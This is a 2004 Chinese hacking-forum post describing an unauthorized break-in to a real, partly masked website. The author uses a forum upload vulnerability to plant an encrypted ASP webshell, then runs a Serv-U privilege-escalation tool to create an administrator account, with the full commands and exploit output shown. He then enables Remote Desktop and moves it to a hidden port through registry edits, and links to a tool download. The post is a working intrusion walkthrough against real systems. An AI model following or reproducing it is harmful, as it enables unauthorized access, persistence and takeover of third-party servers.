‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[原创]偶的一次入侵WEB服务器+开对方的3389

tendy

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
34 
精华
2 
积分
3374 
阅读权限
100 
在线时间
47 小时 
注册时间
2004-7-9 
最后登录
2008-10-9 
楼主 发表于 2004-10-30 03:34  只看该作者

[原创]偶的一次入侵WEB服务器+开对方的3389

文章作者:!Τεηdу~!
文章来源:EvilOctal Security Team [E.S.T]

谈不上什么技术..大侠就免看了...  :)
    最近动网的论坛下载插件中的上传漏洞都被大家给利用快疯了。。比如通过旁入侵大站的。呵呵。。我想大家都看了不过关了这方面的资料。好。闲话就说到这。。看具体行动。
   看下他论坛有设施菜单。。晕。可没看到他的下载菜单。。难道管理员给删了?不信,,http://www.wwp**.com/bbs/down_default.asp 呵呵。下载首面呢。可是"+++系统关闭上传++++++++"汗。。关是关了。可是http://www.wwp**.com/bbs/down_upfile.asp 请先登录。。没删呢,哈哈。。成功了第一步...
   注册帐号,上号登录。把WSockExpert.exe搬出来。这些步骤也就不用我说了。。得到他的Cookie ..现在我们用老兵动网上传利用工具上传。。OK!  bbs/fkue.asp上传成功。。呵呵。。http://www.wwp**.com/bbs/fkue.asp  看到什么了?

哪来的FTP ID和PASS:[s:27] 放弃?  晕。。不!只有按取消///

晕了。。用海洋还运行不了。哎。。对了。把这马用ASP加密工具加密转一下马。再上传,。。哈哈。。成功进入我们加密后的海洋木马了。也没提示输出什么用户名了。。!         
我们的目标不是这网站或论坛。。而是开它的3389。     
下面我们就来开他的3389:
在CMD马中输入:net user  下面就是返回的内容:
复制内容到剪贴板
代码:
\\S197 的用户帐户
-------------------------------------------------------------------------------
Administrator        axino              Guest              
IUser_win2k          IUSR_S197           IWAM_S197           
shanlu             SQLDebugger          wwp**.com            
TsInternetUser        .................下面的我就不写了。呵呵。用户还蛮多的。
命令成功完成。

看到有这个漏洞我们就又成功了一步。此命令能正常运行说明服务器有Serv-U漏洞..嘿嘿。上传建立帐号工具:ftp.exe好,上传完毕。在CMD中输入 d:\www\wwp**.com\ftp.exe "net user tendy 123456 /add"  服务器返回:
>USER LocalAdministrator

<331 User name okay, need password.

******************************************************

>PASS #l@$ak#.lk;0@P

<230 User logged in, proceed.

******************************************************

>SITE MAINTENANCE

******************************************************

[+] Creating New Domain...

<200-DomainID=1

220 Domain settings saved

******************************************************

[+] Domain Haxorcitos:1 Created
[+] Creating Evil User

<200-User=haxorcitos

200 User settings saved

******************************************************

[+] Now Exploiting...

>USER haxorcitos

<331 User name okay, need password.

******************************************************

>PASS whitex0r

<230 User logged in, proceed.

******************************************************

[+] Now Executing: net user fkue fkue /add

<220 Domain deleted

******************************************************
我们用net user fkue查看有这个用户没?
  net user fkue         返回:

用户名            fkue
全名            
注释            
用户的注释         
国家(地区)代码      000 (系统默认值)
帐户启用          Yes
帐户到期          永不
上次设置密码        2004/10/30 上午 02:27
密码到期          2004/12/12 上午 01:15
密码可更改         2004/10/30 上午 02:27
需要密码          Yes
用户可以更改密码     Yes
允许的工作站        All
登录脚本         
用户配置文件        
主目录            
上次登录          永不
可允许的登录小时数    All
本地组会员         *Users           
全局组成员         *None            
命令成功完成。
看到没。还是*Users 组。。我们要的是Administrator组...CMD中输入命令:
d:\www\wwp**.com\ftp.exe "net localgroup administrators fkue /add"  返回:
复制内容到剪贴板
代码:
<220 Serv-U FTP Server v5.0 for WinSock ready...

>USER LocalAdministrator

<331 User name okay, need password.

******************************************************

>PASS #l@$ak#.lk;0@P

<230 User logged in, proceed.

******************************************************

>SITE MAINTENANCE

******************************************************

[+] Creating New Domain...

<200-DomainID=1

220 Domain settings saved

******************************************************

[+] Domain Haxorcitos:1 Created
[+] Creating Evil User

<200-User=haxorcitos

200 User settings saved

******************************************************

[+] Now Exploiting...

>USER haxorcitos

<331 User name okay, need password.

******************************************************

>PASS whitex0r

<230 User logged in, proceed.

******************************************************

[+] Now Executing: net localgroup administrators fkue /add

<220 Domain deleted

******************************************************
再用 net user fkue 命令看看
用户名            fkue
.....................省去了..
可允许的登录小时数    All
本地组会员         *Administrators     *Users           
全局组成员         *None            
命令成功完成。
哈哈。。OK了。。本地组会员         *Administrators     *Users   
现在就是开3389了。。我上传的开3389的工具在d:\www\wwp**.com\3389.exe
命令:
d:\www\wwp**.com\ftp.exe "d:\www\wwp**.com\3389.exe"  返回为:
<220 Serv-U FTP Server v5.0 for WinSock ready ...

>USER LocalAdministrator
.......省去了..
现在那站打不开了,说明了服务器在重启了。,呵呵。,等重启好了就OK。。。

几分钟过。。启动好了,用终端连接工具上去了。

现在我们是来更改3389的默认端口:

第一:[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] PortNumber值,默认是3389,修改为自定义的端口,如7788
第二: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] PortNumber值,默认是3389,修改为自定义的端口,与上面统一,如7788修改值时,选择十进制.

改完以后我们重启一下.再用3389连接器连接。。不过在计算机文本框中就改一下 61.145.126.XXX:7788
IP后面为对应的端口号。。连上去了。。OK//  88..

好了。。就此搁笔.... 文中有不妥的之处还恳请大家纠正。.
工具下载:http://tendy.ys168.com

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题